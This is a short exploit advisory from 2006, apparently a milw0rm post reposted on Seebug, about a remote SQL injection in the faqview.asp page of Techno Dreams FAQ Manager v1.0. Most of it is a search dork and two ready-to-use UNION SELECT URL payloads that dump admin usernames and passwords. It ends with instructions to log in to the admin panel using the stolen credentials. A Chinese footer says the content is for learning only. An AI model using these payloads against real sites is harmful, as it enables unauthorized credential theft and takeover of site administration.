******************************************************************************* # Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability # Author : ajann # Dork : faqview.asp?key # Script Page : http://www.t-dreams.com # Exploit; ******************************************************************************* ###http://[target]/[path]/faqview.asp?key=[SQL HERE] Example: //faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin //faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin With admin username and password take it,after join to login page: ../[path]/admin/ # ajann,Turkey # ... # Im not Hacker! # milw0rm.com [2006-09-17]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论